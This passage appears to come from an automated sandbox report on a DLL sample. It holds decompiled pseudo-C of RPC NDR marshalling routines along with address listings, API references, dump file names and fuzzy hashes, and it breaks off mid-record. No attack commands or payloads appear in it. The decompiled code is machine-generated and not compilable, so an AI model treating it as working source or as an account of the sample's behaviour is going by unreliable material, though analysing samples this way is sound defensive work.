                                                                                              						_v24 = E6F1DAEC0(_v12 & 0x0000ffff,  *(_a8 + 0x3c));
                                                                                              						__ecx = _a8;
                                                                                              						__edx =  *(_a8 + 0x44);
                                                                                              						__eax = _v12 & 0x0000ffff;
                                                                                              						_v16 = E6F1DAEC0(_v12 & 0x0000ffff,  *(_a8 + 0x44));
                                                                                              						__ecx = _v12 & 0x0000ffff;
                                                                                              						__edx = _v16;
                                                                                              						_a8 = E6F1DB0C0(_v12 & 0x0000ffff, _a8, _v16, _v12 & 0x0000ffff);
                                                                                              						__ecx = _a28 & 0x000000ff;
                                                                                              						__eflags = _a28 & 0x000000ff;
                                                                                              						if((_a28 & 0x000000ff) == 0) {
                                                                                              							L44:
                                                                                              							__eax = _v16;
                                                                                              							return _v16;
                                                                                              						} else {
                                                                                              							__edx = _a20 & 0x000000ff;
                                                                                              							__eflags = _a20 & 0x000000ff;
                                                                                              							if((_a20 & 0x000000ff) == 0) {
                                                                                              								__eax = _a24 & 0x000000ff;
                                                                                              								__eflags = _a24 & 0x000000ff;
                                                                                              								if((_a24 & 0x000000ff) == 0) {
                                                                                              									L36:
                                                                                              									__ecx = _a12;
                                                                                              									__eflags =  *_a12;
                                                                                              									if( *_a12 == 0) {
                                                                                              										__edx = _v24;
                                                                                              										_push(_v24);
                                                                                              										__eax = _a8;
                                                                                              										_push(_a8);
                                                                                              										__eax =  *0x6f1d0000();
                                                                                              										__ecx = _a12;
                                                                                              										 *_a12 = _a8;
                                                                                              									}
                                                                                              									L38:
                                                                                              									__edx = _a12;
                                                                                              									__eax = _a8;
                                                                                              									__ecx =  *_a12;
                                                                                              									__eflags =  *_a12 -  *((intOrPtr*)(__eax + 4));
                                                                                              									if( *_a12 !=  *((intOrPtr*)(__eax + 4))) {
                                                                                              										__ecx = _v16;
                                                                                              										__edx = _a12;
                                                                                              										__eax =  *_a12;
                                                                                              										__ecx = _a8;
                                                                                              										__eax = E6F1DAFA0(_a8,  *_a12, _v16);
                                                                                              									} else {
                                                                                              										__edx = _v16;
                                                                                              										_a8 = E6F1DAF00(_a8, _v16);
                                                                                              									}
                                                                                              									__edx = _a16;
                                                                                              									__eax =  *_a16 & 0x000000ff;
                                                                                              									__eflags = __eax - 0x22;
                                                                                              									if(__eax != 0x22) {
                                                                                              										__eax = _a12;
                                                                                              										__ecx =  *__eax;
                                                                                              										_push( *__eax);
                                                                                              										0x6f1d0000();
                                                                                              										__esp = __esp + 4;
                                                                                              										_push(__eax);
                                                                                              										_push("string=%s\n");
                                                                                              										0x6f1d0000();
                                                                                              										__esp = __esp + 8;
                                                                                              									} else {
                                                                                              										__ecx = _a12;
                                                                                              										__edx =  *_a12;
                                                                                              										_push( *_a12);
                                                                                              										0x6f1d0000();
                                                                                              										__esp = __esp + 4;
                                                                                              										_push(__eax);
                                                                                              										_push("string=%s\n");
                                                                                              										0x6f1d0000();
                                                                                              										__esp = __esp + 8;
                                                                                              									}
                                                                                              									goto L44;
                                                                                              								}
                                                                                              								__ecx = _a8;
                                                                                              								__edx =  *(__ecx + 0x20) & 0x000000ff;
                                                                                              								__eflags =  *(__ecx + 0x20) & 0x000000ff;
                                                                                              								if(( *(__ecx + 0x20) & 0x000000ff) != 0) {
                                                                                              									goto L36;
                                                                                              								}
                                                                                              								__eax = _a12;
                                                                                              								__eflags =  *_a12;
                                                                                              								if( *_a12 != 0) {
                                                                                              									goto L36;
                                                                                              								}
                                                                                              								__ecx = _a8;
                                                                                              								__edx = _a8;
                                                                                              								__eax =  *(__ecx + 0x3c);
                                                                                              								__eflags =  *(__ecx + 0x3c) -  *(__edx + 0x44);
                                                                                              								if( *(__ecx + 0x3c) !=  *(__edx + 0x44)) {
                                                                                              									goto L36;
                                                                                              								}
                                                                                              								__ecx = _a12;
                                                                                              								__edx = _a8;
                                                                                              								__eax =  *(__edx + 4);
                                                                                              								 *_a12 =  *(__edx + 4);
                                                                                              								goto L38;
                                                                                              							}
                                                                                              							__eax = _v24;
                                                                                              							_push(_v24);
                                                                                              							__ecx = _a8;
                                                                                              							_push(_a8);
                                                                                              							__eax =  *0x6f1d0000();
                                                                                              							__edx = _a12;
                                                                                              							 *_a12 = _v24;
                                                                                              							goto L38;
                                                                                              						}
                                                                                              					case 4:
                                                                                              						goto L57;
                                                                                              				}
                                                                                              			}













                                                                                              0x6f1dda4e
                                                                                              0x6f1dda50
                                                                                              0x6f1dda50
                                                                                              0x6f1dda4e
                                                                                              0x6f1dda54
                                                                                              0x6f1dda58
                                                                                              0x6f1dda5a
                                                                                              0x6f1dda5c
                                                                                              0x6f1dda60
                                                                                              0x6f1dda64
                                                                                              0x6f1dda6c
                                                                                              0x6f1dda6f
                                                                                              0x6f1dda6f
                                                                                              0x6f1dda71
                                                                                              0x6f1dda74
                                                                                              0x6f1dda77
                                                                                              0x6f1dda7a
                                                                                              0x6f1dda7e
                                                                                              0x6f1dda8a
                                                                                              0x6f1dda8d
                                                                                              0x6f1dda90
                                                                                              0x6f1dda93
                                                                                              0x6f1dda98
                                                                                              0x6f1dda9c
                                                                                              0x6f1dda9f
                                                                                              0x6f1ddaa2
                                                                                              0x6f1ddaa6
                                                                                              0x6f1ddaaa
                                                                                              0x6f1ddab2
                                                                                              0x6f1ddab6
                                                                                              0x6f1ddaba
                                                                                              0x6f1ddabf
                                                                                              0x6f1ddabf
                                                                                              0x6f1ddac3
                                                                                              0x6f1ddac8
                                                                                              0x6f1ddacb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1ddcb9
                                                                                              0x6f1ddcbc
                                                                                              0x6f1ddcc3
                                                                                              0x6f1ddcc6
                                                                                              0x6f1ddccc
                                                                                              0x6f1ddcd0
                                                                                              0x6f1ddcdc
                                                                                              0x6f1ddcdf
                                                                                              0x6f1ddce2
                                                                                              0x6f1ddce6
                                                                                              0x6f1ddcea
                                                                                              0x6f1ddcf6
                                                                                              0x6f1ddcf9
                                                                                              0x6f1ddcfc
                                                                                              0x6f1ddcfd
                                                                                              0x6f1ddd00
                                                                                              0x6f1ddd01
                                                                                              0x6f1ddd06
                                                                                              0x6f1ddd09
                                                                                              0x6f1ddd0d
                                                                                              0x6f1ddd10
                                                                                              0x6f1ddd14
                                                                                              0x6f1ddd21
                                                                                              0x6f1ddd24
                                                                                              0x6f1ddd28
                                                                                              0x6f1ddd2a
                                                                                              0x6f1ddd2c
                                                                                              0x6f1ddd3b
                                                                                              0x6f1ddd40
                                                                                              0x6f1ddd43
                                                                                              0x6f1ddd47
                                                                                              0x6f1ddd49
                                                                                              0x6f1ddd4b
                                                                                              0x6f1ddd4e
                                                                                              0x6f1ddd51
                                                                                              0x6f1ddd53
                                                                                              0x6f1ddd53
                                                                                              0x6f1ddd51
                                                                                              0x6f1ddd57
                                                                                              0x6f1ddd5b
                                                                                              0x6f1ddd5d
                                                                                              0x6f1ddd5f
                                                                                              0x6f1ddd63
                                                                                              0x6f1ddd67
                                                                                              0x6f1ddd6f
                                                                                              0x6f1ddd72
                                                                                              0x6f1ddd72
                                                                                              0x6f1ddd74
                                                                                              0x6f1ddd79
                                                                                              0x6f1ddd7c
                                                                                              0x6f1ddd80
                                                                                              0x6f1ddd88
                                                                                              0x6f1ddd8b
                                                                                              0x6f1ddd8e
                                                                                              0x6f1ddd91
                                                                                              0x6f1ddd94
                                                                                              0x6f1ddd96
                                                                                              0x6f1ddd99
                                                                                              0x6f1ddd9c
                                                                                              0x6f1ddd9f
                                                                                              0x6f1ddda2
                                                                                              0x6f1dddb4
                                                                                              0x6f1dddb4
                                                                                              0x6f1dddb7
                                                                                              0x6f1dddba
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1dddbc
                                                                                              0x6f1dddc3
                                                                                              0x6f1dddc7
                                                                                              0x6f1dddcb
                                                                                              0x6f1dddd7
                                                                                              0x6f1dddab
                                                                                              0x6f1dddae
                                                                                              0x6f1dddae
                                                                                              0x6f1dddb1
                                                                                              0x6f1dddb1
                                                                                              0x6f1ddddc
                                                                                              0x6f1ddde2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1ddad3
                                                                                              0x6f1ddad7
                                                                                              0x6f1ddada
                                                                                              0x6f1ddae7
                                                                                              0x6f1ddaec
                                                                                              0x6f1ddadc
                                                                                              0x6f1ddadc
                                                                                              0x6f1ddae1
                                                                                              0x6f1ddae1
                                                                                              0x6f1ddaf0
                                                                                              0x6f1ddaf3
                                                                                              0x6f1ddaf9
                                                                                              0x6f1ddb05
                                                                                              0x6f1ddb0a
                                                                                              0x6f1ddb0d
                                                                                              0x6f1ddb10
                                                                                              0x6f1ddb14
                                                                                              0x6f1ddb17
                                                                                              0x6f1ddb19
                                                                                              0x6f1ddb1c
                                                                                              0x6f1ddb1f
                                                                                              0x6f1ddb22
                                                                                              0x6f1ddb25
                                                                                              0x6f1ddb27
                                                                                              0x6f1ddb2a
                                                                                              0x6f1ddb2d
                                                                                              0x6f1ddb2e
                                                                                              0x6f1ddb31
                                                                                              0x6f1ddb34
                                                                                              0x6f1ddb35
                                                                                              0x6f1ddb3a
                                                                                              0x6f1ddb3f
                                                                                              0x6f1ddb42
                                                                                              0x6f1ddb47
                                                                                              0x6f1ddb47
                                                                                              0x6f1ddb25
                                                                                              0x6f1ddb4d
                                                                                              0x6f1ddb50
                                                                                              0x6f1ddb54
                                                                                              0x6f1ddb56
                                                                                              0x6f1ddb59
                                                                                              0x6f1ddb5c
                                                                                              0x6f1ddb5d
                                                                                              0x6f1ddb62
                                                                                              0x6f1ddb67
                                                                                              0x6f1ddb6a
                                                                                              0x6f1ddb6f
                                                                                              0x6f1ddb6f
                                                                                              0x6f1ddb75
                                                                                              0x6f1ddb78
                                                                                              0x6f1ddb7c
                                                                                              0x6f1ddb89
                                                                                              0x6f1ddb8c
                                                                                              0x6f1ddb8f
                                                                                              0x6f1ddb93
                                                                                              0x6f1ddba0
                                                                                              0x6f1ddba3
                                                                                              0x6f1ddba8
                                                                                              0x6f1ddbb0
                                                                                              0x6f1ddbb8
                                                                                              0x6f1ddbbc
                                                                                              0x6f1ddbbe
                                                                                              0x6f1ddcac
                                                                                              0x6f1ddcac
                                                                                              0x00000000
                                                                                              0x6f1ddbc4
                                                                                              0x6f1ddbc4
                                                                                              0x6f1ddbc8
                                                                                              0x6f1ddbca
                                                                                              0x6f1ddbe1
                                                                                              0x6f1ddbe5
                                                                                              0x6f1ddbe7
                                                                                              0x6f1ddc17
                                                                                              0x6f1ddc17
                                                                                              0x6f1ddc1a
                                                                                              0x6f1ddc1d
                                                                                              0x6f1ddc1f
                                                                                              0x6f1ddc22
                                                                                              0x6f1ddc23
                                                                                              0x6f1ddc26
                                                                                              0x6f1ddc27
                                                                                              0x6f1ddc2d
                                                                                              0x6f1ddc30
                                                                                              0x6f1ddc30
                                                                                              0x6f1ddc32
                                                                                              0x6f1ddc32
                                                                                              0x6f1ddc35
                                                                                              0x6f1ddc38
                                                                                              0x6f1ddc3a
                                                                                              0x6f1ddc3d
                                                                                              0x6f1ddc51
                                                                                              0x6f1ddc55
                                                                                              0x6f1ddc58
                                                                                              0x6f1ddc5b
                                                                                              0x6f1ddc5f
                                                                                              0x6f1ddc3f
                                                                                              0x6f1ddc3f
                                                                                              0x6f1ddc47
                                                                                              0x6f1ddc4c
                                                                                              0x6f1ddc67
                                                                                              0x6f1ddc6a
                                                                                              0x6f1ddc6d
                                                                                              0x6f1ddc70
                                                                                              0x6f1ddc90
                                                                                              0x6f1ddc93
                                                                                              0x6f1ddc95
                                                                                              0x6f1ddc96
                                                                                              0x6f1ddc9b
                                                                                              0x6f1ddc9e
                                                                                              0x6f1ddc9f
                                                                                              0x6f1ddca4
                                                                                              0x6f1ddca9
                                                                                              0x6f1ddc72
                                                                                              0x6f1ddc72
                                                                                              0x6f1ddc75
                                                                                              0x6f1ddc77
                                                                                              0x6f1ddc78
                                                                                              0x6f1ddc7d
                                                                                              0x6f1ddc80
                                                                                              0x6f1ddc81
                                                                                              0x6f1ddc86
                                                                                              0x6f1ddc8b
                                                                                              0x6f1ddc8b
                                                                                              0x00000000
                                                                                              0x6f1ddc70
                                                                                              0x6f1ddbe9
                                                                                              0x6f1ddbec
                                                                                              0x6f1ddbf0
                                                                                              0x6f1ddbf2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1ddbf4
                                                                                              0x6f1ddbf7
                                                                                              0x6f1ddbfa
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1ddbfc
                                                                                              0x6f1ddbff
                                                                                              0x6f1ddc02
                                                                                              0x6f1ddc05
                                                                                              0x6f1ddc08
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1ddc0a
                                                                                              0x6f1ddc0d
                                                                                              0x6f1ddc10
                                                                                              0x6f1ddc13
                                                                                              0x00000000
                                                                                              0x6f1ddc13
                                                                                              0x6f1ddbcc
                                                                                              0x6f1ddbcf
                                                                                              0x6f1ddbd0
                                                                                              0x6f1ddbd3
                                                                                              0x6f1ddbd4
                                                                                              0x6f1ddbda
                                                                                              0x6f1ddbdd
                                                                                              0x00000000
                                                                                              0x6f1ddbdd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: copying %p to %p$unknown array format 0x%x
                                                                                              • API String ID: 4104443479-2029649059
                                                                                              • Opcode ID: 1b22611a1824101af84e3c400166c9435807708d1df8a5f7a187ce76d3662346
                                                                                              • Instruction ID: ec250e651c3eeefaa742c469d60da20c43345619613443135beb1bfc99400ae2
                                                                                              • Opcode Fuzzy Hash: 1b22611a1824101af84e3c400166c9435807708d1df8a5f7a187ce76d3662346
                                                                                              • Instruction Fuzzy Hash: 99A170B5A04249AFCB04CFA8D890DAE7BB6BF89344F14C159FC159B341D735EA21CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 72%
                                                                                              			E6F1D3AA0(signed int _a4, intOrPtr* _a8, signed short* _a12, signed int _a16) {
                                                                                              				signed char* _v8;
                                                                                              				signed int _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				signed char* _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				intOrPtr _v32;
                                                                                              				intOrPtr _v36;
                                                                                              				char _v40;
                                                                                              				signed int _v44;
                                                                                              				intOrPtr _v48;
                                                                                              				intOrPtr _t116;
                                                                                              				char _t125;
                                                                                              				intOrPtr _t137;
                                                                                              				intOrPtr _t140;
                                                                                              				void* _t152;
                                                                                              				void* _t216;
                                                                                              				void* _t217;
                                                                                              				void* _t218;
                                                                                              				void* _t219;
                                                                                              				void* _t220;
                                                                                              				void* _t221;
                                                                                              
                                                                                              				_v12 = _a12[1] & 0x0000ffff;
                                                                                              				_v8 = 0;
                                                                                              				_v24 = 0;
                                                                                              				_v44 = 0;
                                                                                              				_v32 = 0;
                                                                                              				_v28 = 0;
                                                                                              				_v36 = 0;
                                                                                              				_v16 = 0;
                                                                                              				0x6f1d0000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                              				_t219 = _t218 + 0x14;
                                                                                              				_t116 = _a4;
                                                                                              				_t223 =  *((intOrPtr*)(_t116 + 0x34));
                                                                                              				if( *((intOrPtr*)(_t116 + 0x34)) == 0) {
                                                                                              					_v48 =  *((intOrPtr*)(_a4 + 0x30));
                                                                                              					_v20 =  *((intOrPtr*)(_a4 + 4));
                                                                                              					 *((intOrPtr*)(_a4 + 0x30)) = 1;
                                                                                              					E6F1D5F90(_t223, _a4, _a12);
                                                                                              					 *((intOrPtr*)(_a4 + 0x30)) = _v48;
                                                                                              					 *((intOrPtr*)(_a4 + 0x34)) =  *((intOrPtr*)(_a4 + 4));
                                                                                              					0x6f1d0000("difference = 0x%x\n",  *((intOrPtr*)(_a4 + 0x34)) - _v20);
                                                                                              					_t219 = _t219 + 8;
                                                                                              					_v44 = 1;
                                                                                              					 *((intOrPtr*)(_a4 + 4)) = _v20;
                                                                                              				}
                                                                                              				E6F1D73D0(( *(_a12 + (1 << 0)) & 0x000000ff) + 1, _a4 + 4, ( *(_a12 + (1 << 0)) & 0x000000ff) + 1);
                                                                                              				_t220 = _t219 + 8;
                                                                                              				_a12 =  &(_a12[2]);
                                                                                              				if( *_a12 != 0) {
                                                                                              					_v8 = _a12 +  *_a12;
                                                                                              				}
                                                                                              				_a12 =  &(_a12[1]);
                                                                                              				if(( *_a12 & 0x0000ffff) != 0) {
                                                                                              					_v24 = _a12 + ( *_a12 & 0x0000ffff);
                                                                                              				}
                                                                                              				_a12 =  &(_a12[1]);
                                                                                              				if(_v8 != 0) {
                                                                                              					_t140 = E6F1DD650( *_v8 & 0x000000ff, _a4, _v8);
                                                                                              					_t220 = _t220 + 0xc;
                                                                                              					_v16 = _t140;
                                                                                              					_v12 = _v12 + _v16;
                                                                                              					_v28 =  *((intOrPtr*)(_a4 + 0x3c));
                                                                                              					_v32 =  *((intOrPtr*)(_a4 + 0x44));
                                                                                              					_v36 =  *((intOrPtr*)(_a4 + 0x40));
                                                                                              				}
                                                                                              				if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
                                                                                              					_a16 = 1;
                                                                                              				}
                                                                                              				if((_a16 & 0x000000ff) != 0) {
                                                                                              					_t137 = E6F1DA3B0(_a4, _a4, _v12);
                                                                                              					_t220 = _t220 + 8;
                                                                                              					 *_a8 = _t137;
                                                                                              				}
                                                                                              				_t125 = E6F1D9560(_a4,  *_a8, _a12, _v24, _a16 & 0x000000ff);
                                                                                              				_t221 = _t220 + 0x14;
                                                                                              				_v40 = _t125;
                                                                                              				if(_v8 != 0) {
                                                                                              					 *((intOrPtr*)(_a4 + 0x3c)) = _v28;
                                                                                              					 *((intOrPtr*)(_a4 + 0x44)) = _v32;
                                                                                              					 *((intOrPtr*)(_a4 + 0x40)) = _v36;
                                                                                              					if((_a16 & 0x000000ff) != 0) {
                                                                                              						E6F1E0730(_v40, 0, _v16);
                                                                                              						_t221 = _t221 + 0xc;
                                                                                              					}
                                                                                              					E6F1DD830(_t152, _t216, _t217,  *_v8 & 0x000000ff, _a4,  &_v40, _v8, 0, 0, 1);
                                                                                              				}
                                                                                              				if(_v44 != 0) {
                                                                                              					 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 0x34));
                                                                                              					 *((intOrPtr*)(_a4 + 0x34)) = 0;
                                                                                              				}
                                                                                              				return 0;
                                                                                              			}


























                                                                                              APIs
                                                                                              • _NdrComplexStructMemorySize@8.RGSBZEOG(?,?), ref: 6F1D3B2C
                                                                                              • _memset.LIBCMT ref: 6F1D3CA9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: ComplexMemorySize@8Struct_memset
                                                                                              • String ID: (%p,%p,%p,%d)$difference = 0x%x
                                                                                              • API String ID: 4515687-1755659387
                                                                                              • Opcode ID: e0917642c0f95e4584e08a17328e0bd08be052706335859f3822370c8e4a7bd7
                                                                                              • Instruction ID: 0483b64c185050d1386547bed58aacffd291043ea7cfd1e6d904bc25ef3d5c9f
                                                                                              • Opcode Fuzzy Hash: e0917642c0f95e4584e08a17328e0bd08be052706335859f3822370c8e4a7bd7
                                                                                              • Instruction Fuzzy Hash: 6391E7B4A00249AFDB04CF58C890BEEBBB5BF88344F148159F8599B385D775EA51CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _NdrClientContextMarshall@12.RGSBZEOG(?,?,00000000), ref: 6F1D8794
                                                                                              Strings
                                                                                              • flags: 0x%02x, xrefs: 6F1D875A
                                                                                              • pStubMsg %p, pMemory %p, type 0x%02x, xrefs: 6F1D8713
                                                                                              • invalid format type %x, xrefs: 6F1D8732
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: ClientContextMarshall@12
                                                                                              • String ID: flags: 0x%02x$invalid format type %x$pStubMsg %p, pMemory %p, type 0x%02x
                                                                                              • API String ID: 935922980-1391298755
                                                                                              • Opcode ID: 5e17fd02c22dea6387143984c12dace28545aa4e5e257f86e7a3cb9e988ee96e
                                                                                              • Instruction ID: 922d2988747ef0b6f9a098f15f8c277bea5609b18749072b85665677c34af39e
                                                                                              • Opcode Fuzzy Hash: 5e17fd02c22dea6387143984c12dace28545aa4e5e257f86e7a3cb9e988ee96e
                                                                                              • Instruction Fuzzy Hash: 1811E2B12082946BD708CF69CC60FAB7BB5EF86390F048199FCA48B285D535E530CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 44%
                                                                                              			E6F1D3D00(intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
                                                                                              				signed char* _v8;
                                                                                              				signed int _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				signed char* _v20;
                                                                                              				intOrPtr _t81;
                                                                                              				void* _t125;
                                                                                              				void* _t126;
                                                                                              				void* _t127;
                                                                                              
                                                                                              				_v8 = _a12;
                                                                                              				0x6f1d0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                              				_t126 = _t125 + 0x14;
                                                                                              				if(( *_v8 & 0x000000ff) == 0x1d || ( *_v8 & 0x000000ff) == 0x1e) {
                                                                                              					E6F1D73D0(_a4 + 4, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
                                                                                              					_t127 = _t126 + 8;
                                                                                              					if(( *_v8 & 0x000000ff) != 0x1d) {
                                                                                              						_v20 = _a12;
                                                                                              						_v12 =  *((intOrPtr*)(_v20 + 2));
                                                                                              						_a12 = _v20 + 6;
                                                                                              					} else {
                                                                                              						_v12 = _v8[2] & 0x0000ffff;
                                                                                              						_a12 =  &(_v8[4]);
                                                                                              					}
                                                                                              					if((_a16 & 0x000000ff) == 0) {
                                                                                              						if(( *(_a4 + 0x20) & 0x000000ff) == 0 &&  *_a8 == 0) {
                                                                                              							 *_a8 =  *((intOrPtr*)(_a4 + 4));
                                                                                              						}
                                                                                              					} else {
                                                                                              						_t81 = E6F1DA3B0(_a4, _a4, _v12);
                                                                                              						_t127 = _t127 + 8;
                                                                                              						 *_a8 = _t81;
                                                                                              					}
                                                                                              					 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
                                                                                              					_v16 =  *((intOrPtr*)(_a4 + 0x10));
                                                                                              					E6F1DAF00(_a4, _v12);
                                                                                              					_a12 = E6F1DC2B0(_a4, _v16,  *_a8, _a12, _a16 & 0x000000ff);
                                                                                              					0x6f1d0000("copying %p to %p\n", _v16,  *_a8);
                                                                                              					if( *_a8 != _v16) {
                                                                                              						E6F1E00E0( *_a8, _v16, _v12);
                                                                                              					}
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					0x6f1d0000("invalid format type %x\n",  *_v8 & 0x000000ff);
                                                                                              					 *0x6f1d0000(0x6e6);
                                                                                              					return 0;
                                                                                              				}
                                                                                              			}












                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: (%p, %p, %p, %d)$copying %p to %p$invalid format type %x
                                                                                              • API String ID: 4104443479-4001265739
                                                                                              • Opcode ID: fd667360519f6820f88dac62b29f11ae77111a31de7a9f8fbb14ee9a597f2b36
                                                                                              • Instruction ID: 0041e816f0583099e8ac5e3c2f30aa31cc8d6285e07e84ccf150eb385c13cb2c
                                                                                              • Opcode Fuzzy Hash: fd667360519f6820f88dac62b29f11ae77111a31de7a9f8fbb14ee9a597f2b36
                                                                                              • Instruction Fuzzy Hash: 7D5152B5A04248AFCB04CF98D8919AEBBB5EF49344F14C199F8199B345D731EA61CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 28%
                                                                                              			E6F1D41B0(intOrPtr _a4, intOrPtr _a8, signed char* _a12, signed int _a16) {
                                                                                              				intOrPtr _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				void* _t71;
                                                                                              				void* _t99;
                                                                                              				void* _t100;
                                                                                              
                                                                                              				_v12 = 0;
                                                                                              				0x6f1d0000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                              				if(( *_a12 & 0x000000ff) == 0x21) {
                                                                                              					_v16 =  *((intOrPtr*)(_a4 + 0x30));
                                                                                              					_v8 =  *((intOrPtr*)(_a4 + 4));
                                                                                              					 *((intOrPtr*)(_a4 + 0x30)) = 1;
                                                                                              					 *((intOrPtr*)(_a4 + 0x18)) = 0;
                                                                                              					E6F1D6490(_a4, _a12);
                                                                                              					 *((intOrPtr*)(_a4 + 0x30)) = _v16;
                                                                                              					0x6f1d0000("difference = 0x%x\n",  *((intOrPtr*)(_a4 + 4)) - _v8);
                                                                                              					if( *((intOrPtr*)(_a4 + 0x34)) == 0) {
                                                                                              						 *((intOrPtr*)(_a4 + 0x34)) =  *((intOrPtr*)(_a4 + 4));
                                                                                              						_v12 = 1;
                                                                                              					}
                                                                                              					 *((intOrPtr*)(_a4 + 4)) = _v8;
                                                                                              					E6F1DD650(0x21, _a4, _a12);
                                                                                              					E6F1DD830(_t71, _t99, _t100, 0x21, _a4, _a8, _a12, _a16 & 0x000000ff, 1, 1);
                                                                                              					if(_v12 != 0) {
                                                                                              						 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 0x34));
                                                                                              						 *((intOrPtr*)(_a4 + 0x34)) = 0;
                                                                                              					}
                                                                                              					return 0;
                                                                                              				}
                                                                                              				0x6f1d0000("invalid format type %x\n",  *_a12 & 0x000000ff);
                                                                                              				 *0x6f1d0000(0x6e6);
                                                                                              				return 0;
                                                                                              			}










                                                                                              APIs
                                                                                              • _NdrComplexArrayMemorySize@8.RGSBZEOG(?,?), ref: 6F1D424C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: ArrayComplexMemorySize@8
                                                                                              • String ID: (%p,%p,%p,%d)$difference = 0x%x$invalid format type %x
                                                                                              • API String ID: 2085160478-2050479018
                                                                                              • Opcode ID: aa3fb9a950900c40074ee04d67a230966b039350a74236e4dddd9b35cb4f8ce8
